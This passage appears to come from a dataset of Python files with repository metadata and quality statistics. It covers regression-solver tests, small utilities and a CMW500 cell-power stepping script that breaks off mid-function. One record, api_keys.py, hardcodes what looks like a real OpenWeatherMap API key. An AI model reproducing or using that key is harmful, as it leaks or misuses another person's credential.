- signals: num_words 4035, num_chars 30618, mean_word_length 4.416357, frac_words_unique 0.052045, frac_chars_top_2grams 0.06936, frac_chars_top_3grams 0.089787, frac_chars_top_4grams 0.045791, frac_chars_dupe_5grams 0.880022, dupe_6grams 0.854153, dupe_7grams 0.801627, dupe_8grams 0.78743, dupe_9grams 0.78064, dupe_10grams 0.76257, frac_chars_digital 0.015642, frac_chars_whitespace 0.30469, size_file_byte 30618, num_lines 894, num_chars_line_max 131, num_chars_line_mean 34.248322, frac_chars_alphabet 0.82141, frac_chars_comments 0.337971, frac_lines_dupe_lines 0.672634, frac_chars_string_length 0.001372, codepython_cate_ast 1, codepython_frac_lines_func_ratio 0.171356, codepython_cate_var_zero false, codepython_frac_lines_import 0.017903, codepython_score_lines_no_logic 0.375959; all other signals 0
- flags set: frac_chars_dupe_5grams through frac_chars_dupe_10grams; frac_words_unique and frac_lines_string_concat null; all other flags 0
- effective: 0 · hits: 6
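The `lexico_semantic_feature_processor` at the end of this file dispatches by reflection: `feature.title()` turns a feature name such as `'noun_rate'` into the class name `Noun_Rate`, which is then looked up in `globals()`. A minimal standalone sketch of that pattern (the stub class is illustrative, not blabla's real implementation):

```python
class Noun_Rate:
    """Stub feature class standing in for the real one."""

    def __init__(self, sentence_objs):
        self.sentence_objs = sentence_objs

    def handle(self):
        return len(self.sentence_objs)  # placeholder computation


def feature_processor(sentence_objs, feature):
    # 'noun_rate'.title() == 'Noun_Rate'; look the class up by name and run it.
    cls = globals()[feature.title()]
    return cls(sentence_objs).handle()


print(feature_processor(["sentence one", "sentence two"], "noun_rate"))  # -> 2
```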
**Record 4**

- hexsha: `9c1aa58d7a422c7d917666977fae695aec1830da` · size: 70 · ext: py · lang: Python
- max_stars: `starter_code/api_keys.py` in `shuotang642/Python-APIs-Challenge` @ `52cf9cc274faa2cb54b7c18f6302d4ebfc0f4cb8`, licenses ["ADSL"], count null, events null to null
- max_issues: same path, repo, head, and licenses; count and events null
- max_forks: same path, repo, head, and licenses; count and events null
- content:

```python
# OpenWeatherMap API Key
api_key = "2b5d420394a2cb8a1fed6e5574203e5f"
```

- stats: avg_line_length 23.333333, max_line_length 44, alphanum_fraction 0.842857
- signals: num_words 6, num_chars 70, mean_word_length 9.666667, frac_words_unique 0.666667, frac_chars_top_2grams 0.206897, frac_chars_digital 0.31746, frac_chars_whitespace 0.1, size_file_byte 70, num_lines 2, num_chars_line_max 45, num_chars_line_mean 35, frac_chars_alphabet 0.603175, frac_chars_comments 0.314286, frac_chars_string_length 0.695652, frac_chars_long_word_length 0.695652, codepython_cate_ast 1, codepython_cate_var_zero false; all other signals 0
- flags set: num_words, frac_chars_top_2grams, frac_chars_digital, num_lines, frac_chars_string_length, frac_chars_long_word_length; frac_words_unique and frac_lines_string_concat null; all other flags 0
- effective: 0 · hits: 6
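A hardcoded credential like the one above is what several of the string/digit-fraction signals react to, and it is also the kind of thing that usually should not be committed. A minimal sketch of the usual alternative, reading the key from an environment variable (the variable name is illustrative):

```python
import os

# Hypothetical variable name; set it in the shell, not in source control.
api_key = os.environ.get("OPENWEATHERMAP_API_KEY")
if api_key is None:
    raise RuntimeError("OPENWEATHERMAP_API_KEY is not set")
```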
**Record 5**

- hexsha: `9c41e7cae8f83e7e62dea71f2778af233b57503e` · size: 44 · ext: py · lang: Python
- max_stars: `ui/source/generateSecret.py` in `rpiskule-lewis/devops-task-server` @ `34993152efc0ca1ac15594482102b997a17cac9d`, licenses ["Apache-2.0"], count 1, events 2021-02-01T20:06:16.000Z to 2021-02-01T20:06:16.000Z
- max_issues: same path, repo, head, and licenses; count and events null
- max_forks: same path, repo, head, and licenses; count and events null
- content:

```python
import secrets
print(secrets.token_hex(32))
```

- stats: avg_line_length 14.666667, max_line_length 28, alphanum_fraction 0.818182
- signals: num_words 7, num_chars 44, mean_word_length 5, frac_words_unique 0.857143, frac_chars_digital 0.04878, frac_chars_whitespace 0.068182, size_file_byte 44, num_lines 2, num_chars_line_max 29, num_chars_line_mean 22, frac_chars_alphabet 0.804878, codepython_cate_ast 1, codepython_cate_var_zero true, codepython_frac_lines_import 0.5, codepython_score_lines_no_logic 0.5, codepython_frac_lines_print 0.5; all other signals 0
- flags set: num_words, num_chars, num_lines, codepython_cate_var_zero, codepython_frac_lines_import, codepython_frac_lines_print; frac_words_unique and frac_lines_string_concat null; all other flags 0
- effective: 0 · hits: 6
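`secrets.token_hex(nbytes)` draws `nbytes` cryptographically strong random bytes and returns them as `2 * nbytes` hex characters, so the script above prints a 64-character token. A quick check:

```python
import secrets

token = secrets.token_hex(32)
print(len(token))  # 64 hex characters for 32 random bytes
```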
**Record 6**

- hexsha: `9c4f865f6bbc17c71d282ae07e6b7f2390aae9d7` · size: 14020 · ext: py · lang: Python
- max_stars: `plasticnet/tests/test_solvers_functional.py` in `donovanr/plastic_net` @ `28801059133e3f73359c5787ad235eac6c7e77ee`, licenses ["MIT"], count 1, events 2018-07-29T00:09:48.000Z to 2018-07-29T00:09:48.000Z
- max_issues: same path in `donovanr/plasticnet` @ same head, licenses ["MIT"], count 28, events 2018-07-11T21:35:05.000Z to 2018-07-26T18:10:45.000Z
- max_forks: same path in `donovanr/plastic_net` @ same head, licenses ["MIT"], count 2, events 2018-10-16T17:21:25.000Z to 2019-12-23T06:45:55.000Z
- content:

```python
import numpy as np
from sklearn import linear_model
from sklearn.preprocessing import scale
from sklearn.datasets import make_regression

from plasticnet.solvers.functional import (
    ordinary_least_squares,
    ridge,
    lasso,
    elastic_net,
    general_plastic_net,
    plastic_ridge,
    plastic_lasso,
    hard_plastic_net,
    soft_plastic_net,
    unified_plastic_net,
)


def test_ordinary_least_squares_explicit(N=1500, D=1000, tol=1e-12, max_iter=10000):
    r"""Test explicitly coded special case OLS numba code in :meth:`plasticnet.solvers.functional.ordinary_least_squares` against sklearn LinearRegression."""
    X, y, beta_true = make_regression(
        n_samples=N, n_features=D, n_informative=N, coef=True
    )
    X, y = scale(X), scale(y)
    lm = linear_model.LinearRegression()
    lm.fit(X, y)
    beta = ordinary_least_squares(X, y, tol=tol, max_iter=max_iter)
    np.testing.assert_almost_equal(lm.coef_, beta, decimal=4)


def test_ridge_explicit(N=500, D=1000, tol=1e-12, max_iter=10000):
    r"""Test explicitly coded special case ridge numba code in :meth:`plasticnet.solvers.functional.ridge` against sklearn elastic net with l1_ratio=0."""
    X, y, beta_true = make_regression(
        n_samples=N, n_features=D, n_informative=N, coef=True
    )
    X, y = scale(X), scale(y)
    lambda_total = np.random.exponential()
    lm = linear_model.Ridge(alpha=lambda_total * N, tol=tol, max_iter=max_iter)
    lm.fit(X, y)
    beta = ridge(X, y, lambda_total=lambda_total, tol=tol, max_iter=max_iter)
    np.testing.assert_almost_equal(beta, lm.coef_, decimal=4)


def test_lasso_explicit(N=500, D=1000, tol=1e-12, max_iter=10000):
    r"""Test explicitly coded special case lasso numba code in :meth:`plasticnet.solvers.functional.lasso` against sklearn elastic net with `l1_ratio=1`."""
    X, y, beta_true = make_regression(
        n_samples=N, n_features=D, n_informative=N, coef=True
    )
    X, y = scale(X), scale(y)
    lambda_total = np.random.exponential()
    lm = linear_model.ElasticNet(
        alpha=lambda_total, l1_ratio=1.0, tol=tol, max_iter=max_iter
    )
    lm.fit(X, y)
    beta = lasso(X, y, lambda_total=lambda_total, tol=tol, max_iter=max_iter)
    np.testing.assert_almost_equal(beta, lm.coef_, decimal=4)


def test_elastic_net_explicit_ordinary_least_squares(
    N=1500, D=1000, tol=1e-12, max_iter=10000
):
    r"""Test explicitly coded special case elastic net with :math:`\lambda=0` in :meth:`plasticnet.solvers.functional.elastic_net` against sklearn LinearRegression."""
    X, y, beta_true = make_regression(
        n_samples=N, n_features=D, n_informative=N, coef=True
    )
    X, y = scale(X), scale(y)
    lm = linear_model.LinearRegression()
    lm.fit(X, y)
    beta = elastic_net(X, y, lambda_total=0.0, alpha=0.0, tol=tol, max_iter=max_iter)
    np.testing.assert_almost_equal(lm.coef_, beta, decimal=4)


def test_elastic_net_explicit(N=500, D=1000, tol=1e-12, max_iter=10000):
    r"""Test explicitly coded elastic net in :meth:`plasticnet.solvers.functional.elastic_net` against sklearn ElasticNet."""
    X, y, beta_true = make_regression(
        n_samples=N, n_features=D, n_informative=N // 10, coef=True
    )
    X, y = scale(X), scale(y)
    lambda_total = np.random.exponential()
    alpha = np.random.rand()
    elastic_net_lm = linear_model.ElasticNet(
        alpha=lambda_total, l1_ratio=alpha, tol=tol, max_iter=max_iter
    )
    elastic_net_lm.fit(X, y)
    beta = elastic_net(
        X, y, lambda_total=lambda_total, alpha=alpha, tol=tol, max_iter=max_iter
    )
    np.testing.assert_almost_equal(elastic_net_lm.coef_, beta, decimal=4)


def test_ordinary_least_squares_general(N=1500, D=1000, tol=1e-12, max_iter=10000):
    r"""Test OLS (:math:`\lambda=0` in :meth:`plasticnet.solvers.functional.general_plastic_net`) against sklearn LinearRegression."""
    X, y, beta_true = make_regression(
        n_samples=N, n_features=D, n_informative=N // 10, coef=True
    )
    X, y = scale(X), scale(y)
    lambda_total = 0.0
    alpha = 0.0
    xi = np.zeros(D, dtype=np.float64)
    zeta = np.zeros(D, dtype=np.float64)
    lm = linear_model.LinearRegression()
    lm.fit(X, y)
    beta = general_plastic_net(
        X,
        y,
        xi,
        zeta,
        lambda_total=lambda_total,
        alpha=alpha,
        tol=tol,
        max_iter=max_iter,
    )
    np.testing.assert_almost_equal(lm.coef_, beta, decimal=4)


def test_elastic_net_general(N=500, D=1000, tol=1e-12, max_iter=10000):
    r"""Test elastic net (:math:`\xi=0` and :math:`\zeta=0` in :meth:`plasticnet.solvers.functional.general_plastic_net`) against sklearn ElasticNet."""
    X, y, beta_true = make_regression(
        n_samples=N, n_features=D, n_informative=N // 10, coef=True
    )
    X, y = scale(X), scale(y)
    lambda_total = np.random.exponential()
    alpha = np.random.rand()
    xi = np.zeros(D, dtype=np.float64)
    zeta = np.zeros(D, dtype=np.float64)
    lm = linear_model.ElasticNet(
        alpha=lambda_total, l1_ratio=alpha, tol=tol, max_iter=max_iter
    )
    lm.fit(X, y)
    beta = general_plastic_net(
        X,
        y,
        xi,
        zeta,
        lambda_total=lambda_total,
        alpha=alpha,
        tol=tol,
        max_iter=max_iter,
    )
    np.testing.assert_almost_equal(lm.coef_, beta, decimal=4)


def test_plastic_ridge_trivial(N=500, D=1000, tol=1e-12, max_iter=10000):
    r"""Test plastic ridge (:math:`\zeta=0` in :meth:`plasticnet.solvers.functional.plastic_ridge`) against sklearn Ridge."""
    X, y, beta_true = make_regression(
        n_samples=N, n_features=D, n_informative=N // 10, coef=True
    )
    X, y = scale(X), scale(y)
    lambda_total = np.random.exponential()
    zeta = np.zeros(D, dtype=np.float64)
    lm = linear_model.Ridge(alpha=lambda_total * N, tol=tol, max_iter=max_iter)
    lm.fit(X, y)
    beta = plastic_ridge(
        X, y, zeta, lambda_total=lambda_total, tol=tol, max_iter=max_iter
    )
    np.testing.assert_almost_equal(lm.coef_, beta, decimal=4)


def test_plastic_ridge_real(N=500, D=1000, tol=1e-12, max_iter=10000):
    r"""Test :meth:`plasticnet.solvers.functional.plastic_ridge` against sklearn Ridge with transformed variables."""
    X, y, beta_true = make_regression(
        n_samples=N, n_features=D, n_informative=N // 10, coef=True
    )
    X, y = scale(X), scale(y)
    lambda_total = np.random.exponential()
    zeta = np.random.randn(D).astype(np.float64)
    X_prime = X
    y_prime = y - np.dot(X, zeta)
    lm = linear_model.Ridge(alpha=lambda_total * N, tol=tol, max_iter=max_iter)
    lm.fit(X_prime, y_prime)
    beta_lm = lm.coef_ + zeta
    beta = plastic_ridge(
        X, y, zeta, lambda_total=lambda_total, tol=tol, max_iter=max_iter
    )
    np.testing.assert_almost_equal(beta_lm, beta, decimal=4)


def test_plastic_lasso_trivial(N=500, D=1000, tol=1e-12, max_iter=10000):
    r"""Test plastic lasso (:math:`\xi=0` in :meth:`plasticnet.solvers.functional.plastic_lasso`) against sklearn ElasticNet."""
    X, y, beta_true = make_regression(
        n_samples=N, n_features=D, n_informative=N // 10, coef=True
    )
    X, y = scale(X), scale(y)
    lambda_total = np.random.exponential()
    xi = np.zeros(D, dtype=np.float64)
    lm = linear_model.ElasticNet(
        alpha=lambda_total, l1_ratio=1, tol=tol, max_iter=max_iter
    )
    lm.fit(X, y)
    beta = plastic_lasso(
        X, y, xi, lambda_total=lambda_total, tol=tol, max_iter=max_iter
    )
    np.testing.assert_almost_equal(lm.coef_, beta, decimal=4)


def test_plastic_lasso_real(N=500, D=1000, tol=1e-12, max_iter=10000):
    r"""Test :meth:`plasticnet.solvers.functional.plastic_lasso` against sklearn ElasticNet with transformed variables."""
    X, y, beta_true = make_regression(
        n_samples=N, n_features=D, n_informative=N // 10, coef=True
    )
    X, y = scale(X), scale(y)
    lambda_total = np.random.exponential()
    xi = np.random.randn(D).astype(np.float64)
    X_prime = X
    y_prime = y - np.dot(X, xi)
    lm = linear_model.ElasticNet(
        alpha=lambda_total, l1_ratio=1, tol=tol, max_iter=max_iter
    )
    lm.fit(X_prime, y_prime)
    beta_lm = lm.coef_ + xi
    beta = plastic_lasso(
        X, y, xi, lambda_total=lambda_total, tol=tol, max_iter=max_iter
    )
    np.testing.assert_almost_equal(beta_lm, beta, decimal=4)


def test_hard_plastic_net_trivial(N=500, D=1000, tol=1e-12, max_iter=10000):
    r"""Test hard plastic net (:math:`\xi=0` in :meth:`plasticnet.solvers.functional.hard_plastic_net`) against sklearn ElasticNet."""
    X, y, beta_true = make_regression(
        n_samples=N, n_features=D, n_informative=N // 10, coef=True
    )
    X, y = scale(X), scale(y)
    lambda_total = np.random.exponential()
    alpha = np.random.rand()
    xi = np.zeros(D, dtype=np.float64)
    lm = linear_model.ElasticNet(
        alpha=lambda_total, l1_ratio=alpha, tol=tol, max_iter=max_iter
    )
    lm.fit(X, y)
    beta = hard_plastic_net(
        X, y, xi, lambda_total=lambda_total, alpha=alpha, tol=tol, max_iter=max_iter
    )
    np.testing.assert_almost_equal(lm.coef_, beta, decimal=4)


def test_hard_plastic_net_limiting_cases(N=500, D=1000, tol=1e-12, max_iter=10000):
    r"""Test hard plastic net :meth:`plasticnet.solvers.functional.hard_plastic_net` against sklearn ElasticNet in limiting cases."""
    X, y, beta_true = make_regression(
        n_samples=N, n_features=D, n_informative=N // 10, coef=True
    )
    X, y = scale(X), scale(y)
    lambda_total = np.random.exponential()
    xi = np.random.randn(D).astype(np.float64)
    X_prime = X
    y_prime = y - np.dot(X, xi)
    alpha = 1.0
    lm = linear_model.ElasticNet(
        alpha=lambda_total, l1_ratio=alpha, tol=tol, max_iter=max_iter
    )
    lm.fit(X_prime, y_prime)
    beta_lm = lm.coef_ + xi
    beta = hard_plastic_net(
        X, y, xi, lambda_total=lambda_total, alpha=alpha, tol=tol, max_iter=max_iter
    )
    np.testing.assert_almost_equal(beta_lm, beta, decimal=4)
    alpha = 0.0
    lm = linear_model.Ridge(alpha=lambda_total * N, tol=tol, max_iter=max_iter)
    lm.fit(X, y)
    beta_lm = lm.coef_
    beta = hard_plastic_net(
        X, y, xi, lambda_total=lambda_total, alpha=alpha, tol=tol, max_iter=max_iter
    )
    np.testing.assert_almost_equal(beta_lm, beta, decimal=4)


def test_soft_plastic_net_trivial(N=500, D=1000, tol=1e-12, max_iter=10000):
    r"""Test soft plastic net (:math:`\zeta=0` in :meth:`plasticnet.solvers.functional.soft_plastic_net`) against sklearn ElasticNet."""
    X, y, beta_true = make_regression(
        n_samples=N, n_features=D, n_informative=N // 10, coef=True
    )
    X, y = scale(X), scale(y)
    lambda_total = np.random.exponential()
    alpha = np.random.rand()
    zeta = np.zeros(D, dtype=np.float64)
    lm = linear_model.ElasticNet(
        alpha=lambda_total, l1_ratio=alpha, tol=tol, max_iter=max_iter
    )
    lm.fit(X, y)
    beta = soft_plastic_net(
        X, y, zeta, lambda_total=lambda_total, alpha=alpha, tol=tol, max_iter=max_iter
    )
    np.testing.assert_almost_equal(lm.coef_, beta, decimal=4)


def test_soft_plastic_net_limiting_cases(N=500, D=1000, tol=1e-12, max_iter=10000):
    r"""Test :meth:`plasticnet.solvers.functional.soft_plastic_net` against sklearn ElasticNet in limiting cases."""
    X, y, beta_true = make_regression(
        n_samples=N, n_features=D, n_informative=N // 10, coef=True
    )
    X, y = scale(X), scale(y)
    lambda_total = np.random.exponential()
    zeta = np.random.randn(D).astype(np.float64)
    alpha = 1.0
    lm = linear_model.ElasticNet(
        alpha=lambda_total, l1_ratio=alpha, tol=tol, max_iter=max_iter
    )
    lm.fit(X, y)
    beta_lm = lm.coef_
    beta = soft_plastic_net(
        X, y, zeta, lambda_total=lambda_total, alpha=alpha, tol=tol, max_iter=max_iter
    )
    np.testing.assert_almost_equal(beta_lm, beta, decimal=4)
    alpha = 0.0
    X_prime = X
    y_prime = y - np.dot(X, zeta)
    lm = linear_model.Ridge(alpha=lambda_total * N, tol=tol, max_iter=max_iter)
    lm.fit(X_prime, y_prime)
    beta_lm = lm.coef_ + zeta
    beta = soft_plastic_net(
        X, y, zeta, lambda_total=lambda_total, alpha=alpha, tol=tol, max_iter=max_iter
    )
    np.testing.assert_almost_equal(beta_lm, beta, decimal=4)


def test_unified_plastic_net_trivial(N=500, D=1000, tol=1e-12, max_iter=10000):
    r"""Test unified plastic net (:math:`\xi=0` in :meth:`plasticnet.solvers.functional.unified_plastic_net`) against sklearn ElasticNet."""
    X, y, beta_true = make_regression(
        n_samples=N, n_features=D, n_informative=N // 10, coef=True
    )
    X, y = scale(X), scale(y)
    lambda_total = np.random.exponential()
    alpha = np.random.rand()
    xi = np.zeros(D, dtype=np.float64)
    lm = linear_model.ElasticNet(
        alpha=lambda_total, l1_ratio=alpha, tol=tol, max_iter=max_iter
    )
    lm.fit(X, y)
    beta = unified_plastic_net(
        X, y, xi, lambda_total=lambda_total, alpha=alpha, tol=tol, max_iter=max_iter
    )
    np.testing.assert_almost_equal(lm.coef_, beta, decimal=4)


def test_unified_plastic_net_real(N=500, D=1000, tol=1e-12, max_iter=10000):
    r"""Test :meth:`plasticnet.solvers.functional.unified_plastic_net` against sklearn ElasticNet with transformed variables."""
    X, y, beta_true = make_regression(
        n_samples=N, n_features=D, n_informative=N // 10, coef=True
    )
    X, y = scale(X), scale(y)
    lambda_total = np.random.exponential()
    alpha = np.random.rand()
    xi = np.random.randn(D).astype(np.float64)
    X_prime = X
    y_prime = y - np.dot(X, xi)
    lm = linear_model.ElasticNet(
        alpha=lambda_total, l1_ratio=alpha, tol=tol, max_iter=max_iter
    )
    lm.fit(X_prime, y_prime)
    beta_lm = lm.coef_ + xi
    beta = unified_plastic_net(
        X, y, xi, lambda_total=lambda_total, alpha=alpha, tol=tol, max_iter=max_iter
    )
    np.testing.assert_almost_equal(beta_lm, beta, decimal=4)
```

- stats: avg_line_length 30.745614, max_line_length 167, alphanum_fraction 0.677817
- signals: num_words 2200, num_chars 14020, mean_word_length 4.094091, frac_words_unique 0.045455, frac_chars_top_2grams 0.067614, frac_chars_top_3grams 0.034973, frac_chars_top_4grams 0.050516, frac_chars_dupe_5grams 0.944044, dupe_6grams 0.934939, dupe_7grams 0.934939, dupe_8grams 0.906406, dupe_9grams 0.892306, dupe_10grams 0.870989, frac_chars_digital 0.033256, frac_chars_whitespace 0.19572, size_file_byte 14020, num_lines 455, num_chars_line_max 168, num_chars_line_mean 30.813187, frac_chars_alphabet 0.76552, frac_chars_comments 0.154565, frac_lines_dupe_lines 0.667712, frac_lines_assert 0.059561, codepython_cate_ast 1, codepython_frac_lines_func_ratio 0.053292, codepython_cate_var_zero false, codepython_frac_lines_import 0.015674, codepython_score_lines_no_logic 0.068966; all other signals 0
- flags set: frac_chars_dupe_5grams through frac_chars_dupe_10grams; frac_words_unique and frac_lines_string_concat null; all other flags 0
- effective: 0 · hits: 6
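Several of the `_real` and `_limiting_cases` tests above share one trick: to validate a plastic-net solver with target vector ξ (or ζ), they fit a plain sklearn model on the shifted response y − Xξ and then add ξ back onto the coefficients. The sketch below is a standalone illustration of why that works in the ridge case, using only numpy and scikit-learn (not plasticnet):

```python
import numpy as np
from sklearn.linear_model import Ridge

rng = np.random.default_rng(0)
N, D = 200, 50
X = rng.standard_normal((N, D))
y = rng.standard_normal(N)
xi = rng.standard_normal(D)

# Ridge on the shifted target solves min_c ||(y - X xi) - X c||^2 + alpha ||c||^2.
# Substituting b = c + xi turns this into min_b ||y - X b||^2 + alpha ||b - xi||^2,
# a ridge penalty centered at xi, so adding xi back recovers that solution.
lm = Ridge(alpha=1.0, fit_intercept=False)
lm.fit(X, y - X @ xi)
beta = lm.coef_ + xi
```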
**Record 7**

- hexsha: `92caa188d3455fb13396e2dda05d84cfd2136dac` · size: 41 · ext: py · lang: Python
- max_stars: `misc/ranger_metaindex/__init__.py` in `vonshednob/metaindex` @ `d20c043d81f353d0593af77d0cb8046aebbe3cf1`, licenses ["MIT"], count 4, events 2022-01-12T14:25:49.000Z to 2022-01-29T08:10:04.000Z
- max_issues: same path, repo, head, and licenses; count and events null
- max_forks: same path, repo, head, and licenses; count and events null
- content:

```python
from .linemode import MetaIndexLinemode
```

- stats: avg_line_length 13.666667, max_line_length 39, alphanum_fraction 0.853659
- signals: num_words 4, num_chars 41, mean_word_length 8.75, frac_words_unique 1, frac_chars_whitespace 0.121951, size_file_byte 41, num_lines 2, num_chars_line_max 40, num_chars_line_mean 20.5, frac_chars_alphabet 0.972222, codepython_cate_ast 1, codepython_cate_var_zero true, codepython_frac_lines_import 1, codepython_score_lines_no_logic 1; all other signals 0
- flags set: num_words, num_chars, num_lines, codepython_cate_var_zero, codepython_frac_lines_import, codepython_score_lines_no_logic; frac_words_unique and frac_lines_string_concat null; all other flags 0
- effective: 0 · hits: 6
**Record 8**

- hexsha: `13063d80805df543b6de4e92125bddc74cd29054` · size: 275 · ext: py · lang: Python
- max_stars: `randomColor.py` in `ombe1229/UsefulThings` @ `629655f35764eb490016df7d0bd1bdd024444fd1`, licenses ["WTFPL"], count and events null
- max_issues: same path, repo, head, and licenses; count and events null
- max_forks: same path, repo, head, and licenses; count 1, events 2021-01-21T10:34:18.000Z to 2021-01-21T10:34:18.000Z
- content:

```python
import random


def random_hex():
    result = ""
    for _ in "RGB":
        i = random.randrange(0, 2**8)
        result += i.to_bytes(1, "big").hex()
    return result


def random_rgb():
    return (random.randint(0, 255), random.randint(0, 255), random.randint(0, 255))
```

- stats: avg_line_length 19.642857, max_line_length 83, alphanum_fraction 0.592727
- signals: num_words 40, num_chars 275, mean_word_length 3.975, frac_words_unique 0.5, frac_chars_top_2grams 0.245283, frac_chars_top_3grams 0.264151, frac_chars_top_4grams 0.320755, frac_chars_dupe_5grams 0.320755, dupe_6grams 0.320755, dupe_7grams 0.320755, dupe_8grams 0.320755, frac_chars_digital 0.076555, frac_chars_whitespace 0.24, size_file_byte 275, num_lines 13, num_chars_line_max 84, num_chars_line_mean 21.153846, frac_chars_alphabet 0.684211, frac_chars_string_length 0.021818, codepython_cate_ast 1, codepython_frac_lines_func_ratio 0.222222, codepython_cate_var_zero false, codepython_frac_lines_import 0.111111, codepython_frac_lines_simplefunc 0.111111, codepython_score_lines_no_logic 0.555556; all other signals 0
- flags set: frac_chars_top_2grams, frac_chars_top_3grams, frac_chars_top_4grams, codepython_frac_lines_func_ratio, codepython_frac_lines_simplefunc, codepython_score_lines_no_logic; frac_words_unique and frac_lines_string_concat null; all other flags 0
- effective: 0 · hits: 6
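`random_hex` draws one byte per R/G/B channel and concatenates the two-digit hex forms, so its result is always six hex digits. A compact, self-contained equivalent, assuming a single uniform draw over the whole 24-bit color space is acceptable:

```python
import random

# One draw over the full 24-bit color space, zero-padded to six hex digits.
print(f"{random.randrange(0, 2**24):06x}")
```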
133d31149b52bc82f62935af5c69f9ce078a11f3
| 10,563
|
py
|
Python
|
cellPowerManager.py
|
GCFprojects/Automation-tool-for-CMW-500
|
4a8917439af71ebef864142bfde27339f553ef9a
|
[
"MIT"
] | null | null | null |
cellPowerManager.py
|
GCFprojects/Automation-tool-for-CMW-500
|
4a8917439af71ebef864142bfde27339f553ef9a
|
[
"MIT"
] | null | null | null |
cellPowerManager.py
|
GCFprojects/Automation-tool-for-CMW-500
|
4a8917439af71ebef864142bfde27339f553ef9a
|
[
"MIT"
] | 1
|
2019-01-15T09:56:40.000Z
|
2019-01-15T09:56:40.000Z
|
from PyQt4.QtCore import QThread
import visa
import time
class CellPowerTest(QThread):
def __init__(self, channel_to_test, connect_address='', cell_test_loop=1,
cell_1_power_min=-145, cell_1_power_max=-46,
cell_1_step=1, cell_1_time=1,
cell_2_power_min=-145, cell_2_power_max=-46,
cell_2_step=1, cell_2_time=1,
parent=None):
super(CellPowerTest, self).__init__(parent)
self.connect_address = connect_address
self.rm = visa.ResourceManager()
self.cmw_connection = self.rm.open_resource(self.connect_address)
self.channel_to_test = channel_to_test
self.cell_test_loop = cell_test_loop
if channel_to_test == '0' or channel_to_test == '1':
self.cell_1_power_min = cell_1_power_min
self.cell_1_power_max = cell_1_power_max
self.cell_1_step = cell_1_step
self.cell_1_time = cell_1_time
if channel_to_test == '0' or channel_to_test == '2':
self.cell_2_power_min = cell_2_power_min
self.cell_2_power_max = cell_2_power_max
self.cell_2_step = cell_2_step
self.cell_2_time = cell_2_time
def run(self):
# print(self.connect_address)
# self.connect_to_cmw()
self.attenuation_test()
def connect_to_cmw(self):
print(self.cmw_connection.query("*IDN?"))
self.cmw_connection.clear()
self.cmw_connection.timeout = 2000
self.cmw_connection.write("CONFigure:LTE:SIGN1:DL:PCC:RSEPre:LEVel?")
print(self.cmw_connection.read())
self.cmw_connection.clear()
def attenuation_test(self):
self.cmw_connection.clear()
for i in range(int(self.cell_test_loop)):
# Jeżeli user zaznaczył dwa kanały uruchom test '0'
if self.channel_to_test == '0':
cell_1_flag = float(self.cell_1_power_min)
cell_2_flag = float(self.cell_2_power_min)
steps_for_cell_1 = (float(self.cell_1_power_min) - float(self.cell_1_power_max)) / float(
self.cell_1_step)
steps_for_cell_2 = (float(self.cell_2_power_min) - float(self.cell_2_power_max)) / float(
self.cell_2_step)
if steps_for_cell_1 < 0:
steps_for_cell_1 = -steps_for_cell_1
if steps_for_cell_2 < 0:
steps_for_cell_2 = -steps_for_cell_2
if steps_for_cell_1 <= steps_for_cell_2:
if (self.cell_1_power_min <= self.cell_2_power_min) and \
(self.cell_1_power_max >= self.cell_2_power_max):
step = 1
for item in range(int(steps_for_cell_1 + 1)):
print('---------------Loop: ' + str(i + 1) + ' Step: ' + str(step) + '---------------')
self.manage_cell_1_power(cell_1_flag)
self.manage_cell_2_power(cell_2_flag)
cell_1_flag += float(self.cell_1_step)
cell_2_flag -= float(self.cell_2_step)
step += 1
time.sleep(float(self.cell_1_time))
cell_1_flag = float(self.cell_1_power_max)
cell_2_flag = float(self.cell_2_power_max)
for item in range(int(steps_for_cell_1 + 1)):
print('---------------Loop: ' + str(i + 1) + ' Step: ' + str(step) + '---------------')
self.manage_cell_1_power(cell_1_flag)
self.manage_cell_2_power(cell_2_flag)
cell_1_flag -= float(self.cell_1_step)
cell_2_flag += float(self.cell_2_step)
step += 1
time.sleep(float(self.cell_1_time))
elif (self.cell_1_power_min >= self.cell_2_power_min) and \
(self.cell_1_power_max <= self.cell_2_power_max):
step = 0
for item in range(int(steps_for_cell_1 + 1)):
print('---------------Loop: ' + str(i + 1) + ' Step: ' + str(step) + '---------------')
self.manage_cell_1_power(cell_1_flag)
self.manage_cell_2_power(cell_2_flag)
cell_1_flag -= float(self.cell_1_step)
cell_2_flag += float(self.cell_2_step)
step += 1
time.sleep(float(self.cell_1_time))
cell_1_flag = float(self.cell_1_power_max)
cell_2_flag = float(self.cell_2_power_max)
for item in range(int(steps_for_cell_1 + 1)):
print('---------------Loop: ' + str(i + 1) + ' Step: ' + str(step) + '---------------')
self.manage_cell_1_power(cell_1_flag)
self.manage_cell_2_power(cell_2_flag)
cell_1_flag += float(self.cell_1_step)
cell_2_flag -= float(self.cell_2_step)
step += 1
time.sleep(float(self.cell_1_time))
# Jeżeli user zaznaczył tylko kanał pierwszy uruchom test '1'
elif self.channel_to_test == '1':
cell_1_flag = float(self.cell_1_power_min)
item = 1
while float(self.cell_1_power_min) <= cell_1_flag and float(self.cell_1_power_max) >= cell_1_flag:
print('--------------- Loop: ' + str(i+1) + ' Step: ' + str(item) + ' ---------------')
self.manage_cell_1_power(cell_1_flag)
cell_1_flag = float(cell_1_flag) + float(self.cell_1_step)
item += 1
time.sleep(float(self.cell_1_time))
while float(self.cell_1_power_min) >= cell_1_flag and float(self.cell_1_power_max) <= cell_1_flag:
print('--------------- Loop: ' + str(i + 1) + ' Step: ' + str(item) + ' ---------------')
self.manage_cell_1_power(cell_1_flag)
cell_1_flag = float(cell_1_flag) - float(self.cell_1_step)
item += 1
time.sleep(float(self.cell_1_time))
cell_1_flag = float(self.cell_1_power_max)
while float(self.cell_1_power_min) <= cell_1_flag and float(self.cell_1_power_max) >= cell_1_flag:
print('--------------- Loop: ' + str(i+1) + ' Step: ' + str(item) + ' ---------------')
self.manage_cell_1_power(cell_1_flag)
cell_1_flag = float(cell_1_flag) - float(self.cell_1_step)
item += 1
time.sleep(float(self.cell_1_time))
while float(self.cell_1_power_min) >= cell_1_flag and float(self.cell_1_power_max) <= cell_1_flag:
print('--------------- Loop: ' + str(i+1) + ' Step: ' + str(item) + ' ---------------')
self.manage_cell_1_power(cell_1_flag)
cell_1_flag = float(cell_1_flag) + float(self.cell_1_step)
item += 1
time.sleep(float(self.cell_1_time))
# Jeżeli user zaznaczył tylko kanał drugi uruchom test '2'
elif self.channel_to_test == '2':
item = 1
cell_2_flag = float(self.cell_2_power_min)
while float(self.cell_2_power_min) <= cell_2_flag and float(self.cell_2_power_max) >= cell_2_flag:
